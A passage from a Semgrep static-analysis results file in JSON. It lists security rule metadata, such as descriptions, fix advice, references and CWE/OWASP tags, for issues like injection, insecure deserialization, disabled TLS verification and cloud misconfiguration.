Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.pyramid.deserialization.tainted-json-pyramid.tainted-json-pyramid"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"help":{"markdown":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification)\n - [https://nodejs.org/api/https.html#https_https_request_options_callback](https://nodejs.org/api/https.html#https_https_request_options_callback)\n - [https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100](https://stackoverflow.com/questions/20433287/node-js-request-cert-has-expired#answer-29397100)\n","text":"Checks for setting the environment variable NODE_TLS_REJECT_UNAUTHORIZED to 0, which disables TLS verification. This should only be used for debugging purposes. Setting the option rejectUnauthorized to false bypasses verification against the list of trusted CAs, which also leads to insecure transport. These options lead to vulnerability to MTM attacks, and should not be used."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","id":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","name":"problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.js-node.bypass-tls-verification.bypass-tls-verification"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"help":{"markdown":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny)\n - [https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/storage_account_network_rules#default_action)\n - [https://docs.microsoft.com/en-us/azure/firewall/rule-processing](https://docs.microsoft.com/en-us/azure/firewall/rule-processing)\n","text":"Detected a Storage that was not configured to deny action by default. Add `default_action = \"Deny\"` in your resource block."},"helpUri":"https://semgrep.dev/r/terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","id":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","name":"terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny","properties":{"precision":"very-high","tags":["CWE-16: CWE CATEGORY: Configuration","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.azure.security.storage.storage-default-action-deny.storage-default-action-deny"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"help":{"markdown":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"The AWS SSM logs are unencrypted or disabled. Please enable logs and use AWS KMS encryption key to protect SSM logs. To create your own, create a aws_kms_key resource or use the ARN string of a key in your account."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","id":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","name":"terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues","properties":{"precision":"very-high","tags":["CWE-326: Inadequate Encryption Strength","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-ssm-document-logging-issues.aws-ssm-document-logging-issues"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"help":{"markdown":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected a formatted string in a SQL statement. This could lead to SQL injection if variables in the SQL statement are not properly sanitized. Use a prepared statements (java.sql.PreparedStatement) instead. You can obtain a PreparedStatement using 'connection.prepareStatement'."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","id":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","name":"java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.sqli.hibernate-sqli.hibernate-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A specially crafted calldata may be used to impersonate other accounts"},"help":{"markdown":"A specially crafted calldata may be used to impersonate other accounts\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection)\n - [https://rekt.news/superfluid-rekt/](https://rekt.news/superfluid-rekt/)\n - [https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd](https://medium.com/superfluid-blog/08-02-22-exploit-post-mortem-15ff9c97cdd)\n - [https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7](https://polygonscan.com/address/0x07711bb6dfbc99a1df1f2d7f57545a67519941e7)\n","text":"A specially crafted calldata may be used to impersonate other accounts"},"helpUri":"https://semgrep.dev/r/solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","id":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","name":"solidity.security.superfluid-ctx-injection.superfluid-ctx-injection","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.superfluid-ctx-injection.superfluid-ctx-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","id":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","name":"javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.mssql.node-mssql-hardcoded-secret.node-mssql-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html](https://pandas.pydata.org/docs/reference/api/pandas.read_pickle.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_pickle()` function uses `pickle` for object deserialization and should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","id":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","name":"python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pandas-pickle.tainted-pandas-pickle"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"help":{"markdown":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none)\n - [https://flask-login.readthedocs.io/en/latest/#session-protection](https://flask-login.readthedocs.io/en/latest/#session-protection)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Flask-Login provides session protection to help prevent user sessions from being stolen. When this is active, sessions will be marked as non-fresh when the user's IP or user agent is changed. It is not advised to disable this feature."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","id":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","name":"python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none","properties":{"precision":"very-high","tags":["CWE-613: Insufficient Session Expiration","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-login-session-protection-app-config-none.flask-login-session-protection-app-config-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"help":{"markdown":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1)\n - [https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html](https://security.googleblog.com/2017/02/announcing-first-sha1-collision.html)\n - [https://shattered.io/](https://shattered.io/)\n","text":"Should not use SHA1 to generate hashes. There is a proven SHA1 hash collision by Google, which could lead to vulnerabilities. Use SHA256, SHA3 or other hashing functions instead."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","id":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","name":"ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.weak-hashes-sha1.weak-hashes-sha1"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"help":{"markdown":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection)\n - [https://semgrep.dev/docs/cheat-sheets/python-command-injection/](https://semgrep.dev/docs/cheat-sheets/python-command-injection/)\n","text":"Detected user input entering a `subprocess` call unsafely. This could result in a command injection vulnerability. An attacker could use this vulnerability to execute arbitrary commands on the host, which allows them to download malware, scan sensitive data, or run any command they wish on the server. Do not let users choose the command to run. In general, prefer to use Python API versions of system commands. If you must use subprocess, use a dictionary to allowlist a set of commands."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.subprocess-injection.subprocess-injection","id":"python.flask.security.injection.subprocess-injection.subprocess-injection","name":"python.flask.security.injection.subprocess-injection.subprocess-injection","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.subprocess-injection.subprocess-injection"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". Make sure that the choice of the `None` value is intentional and that you understand the potential security implications. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests. While 'Strict' is the most secure option, 'Lax' is a good compromise between security and usability and this default value is secure for most applications. A secure default approach would consist of creating a custom response class, overriding the `set_cookie` method to set this flag to `Lax` by default, setting the `response_class` attribute of your Flask app to use the custom response class, setting the flag a different value on a case-by-case basis only when necessary."},"helpUri":"https://semgrep.dev/r/python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","id":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","name":"python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.web.flask-cookie-samesite-missing.flask-cookie-samesite-missing"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django)\n - [https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems](https://docs.pyfilesystem.org/en/latest/guide.html#opening-filesystems)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","id":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","name":"python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-path-traversal-pillow-django.tainted-path-traversal-pillow-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"help":{"markdown":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa)\n - [https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/](https://cryptography.io/en/latest/hazmat/primitives/asymmetric/dsa/)\n - [https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf](https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-5.pdf)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption](https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/04-Testing_for_Weak_Encryption)\n - [https://words.filippo.io/dispatches/dsa/](https://words.filippo.io/dispatches/dsa/)\n","text":"DSA is a legacy algorithm and should generally be avoided in favor of choices like EdDSA using curve25519 or ECDSA. In general, low-level cryptographic primitives, found in the `cryptography.hazmat package`, are complex and potentially dangerous, requiring deep cryptographic knowledge. It is recommended to use the higher-level recipes layer as a secure default and resort to the hazmat layer only when necessary."},"helpUri":"https://semgrep.dev/r/python.cryptography.cryptography-dsa.cryptography-dsa","id":"python.cryptography.cryptography-dsa.cryptography-dsa","name":"python.cryptography.cryptography-dsa.cryptography-dsa","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: python.cryptography.cryptography-dsa.cryptography-dsa"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url)\n - [https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html](https://react.dev/reference/react-dom/components/common#dangerously-setting-the-inner-html)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. Validate the user input, perform contextual output encoding, or sanitize the input. If you have to use dangerouslySetInnerHTML, consider using a sanitization library such as DOMPurify to sanitize the HTML within."},"helpUri":"https://semgrep.dev/r/typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","id":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","name":"typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.react-dangerouslysetinnerhtml-url.react-dangerouslysetinnerhtml-url"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"help":{"markdown":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n","text":"Detected the decoding of a JWT token without a verify step. JWT tokens must be verified before use, otherwise the token's integrity is unknown. This means a malicious actor could forge a JWT token with any claims. Validate the token before using it."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","id":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","name":"csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify","properties":{"precision":"very-high","tags":["CWE-345: Insufficient Verification of Data Authenticity","HIGH CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.jwt.jwt-decode-without-verify.jwt-decode-without-verify"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems](https://wiki.sei.cmu.edu/confluence/display/c/STR02-C.+Sanitize+data+passed+to+complex+subsystems)\n","text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent this vulnerability, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the input, and use safe methods for executing the commands."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.command-injection-path.command-injection-path","id":"cpp.lang.security.system-command.command-injection-path.command-injection-path","name":"cpp.lang.security.system-command.command-injection-path.command-injection-path","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","MEDIUM CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.command-injection-path.command-injection-path"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected use of an insecure SSL version. Secure SSL 